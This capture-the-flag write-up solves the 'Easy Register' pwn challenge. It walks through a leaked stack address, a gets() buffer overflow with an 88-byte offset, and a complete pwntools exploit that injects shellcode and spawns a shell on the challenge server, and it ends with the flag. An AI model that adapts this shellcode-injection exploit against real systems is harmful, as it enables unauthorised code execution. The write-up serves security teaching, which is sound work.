Easy Register
- First let’s download and analyze the binary
Info
- ELF 64-bit executable
- Dynamically linked
- Not stripped
checksec:
- The Stack is executable because NX is disabled
- First let’s run the binary and see what it gives
Analyzing
➜ pwn ./easy_register
_ _______________ _ _ ____
/ |___ /___ /___ | | | | _ \
| | |_ \ |_ \ / /| | | | |_) |
| |___) |__) |/ / | |_| | __/
|_|____/____//_/ \___/|_|
[i] Initialized attendee listing at 0x7ffd0421cac0.
[i] Starting registration application.
Hacker name > jopraveen
[+] Registration completed. Enjoy!
[+] Exiting.
- We have a leak
0x7ffd0421cac0
- Most likely, this will be the starting address of our buffer
- Then we’re prompted to give our name
- May be there’s a buffer overflow?
- Let’s decompile this binary and see what it does 😃
- Cool, they’re using gets and it’s vulnerable to buffer overflow
- Find the offset to Instruction pointer (I didn’t mention it in the post because it’s very easy)
- Now let’s write our exploit
from pwn import *
elf = context.binary = ELF('easy_register')
p = elf.process()
p = remote('easyregister.ctf.intigriti.io',7777)
p.recvuntil('listing at ')
stack_buffer = int(p.recvline().replace(b'.',b''),16)
log.success(f'stack leak: {hex(stack_buffer)}')
- First let’s store the leak in a variable
payload = asm(shellcraft.sh()) # shellcode
payload += b'A'*(88 - len(payload)) # junk
payload += p64(stack_buffer) # buffer base address
- Let’s put our shellcode at the beginning and fill some junk until RIP
Note: Offset to RIP is 88
- Finally let’s overwrite the Instruction pointer with the leaked value (our input buffer’s starting address)
Full exploit
from pwn import *
elf = context.binary = ELF('easy_register')
p = elf.process()
p = remote('easyregister.ctf.intigriti.io',7777)
p.recvuntil('listing at ')
stack_buffer = int(p.recvline().replace(b'.',b''),16)
log.success(f'stack leak: {hex(stack_buffer)}')
payload = asm(shellcraft.sh())
payload += b'A'*(88 - len(payload))
payload += p64(stack_buffer)
p.sendline(payload)
p.interactive()
- We got our flag
1337UP{Y0u_ju5t_r3g15t3r3d_f0r_50m3_p01nt5}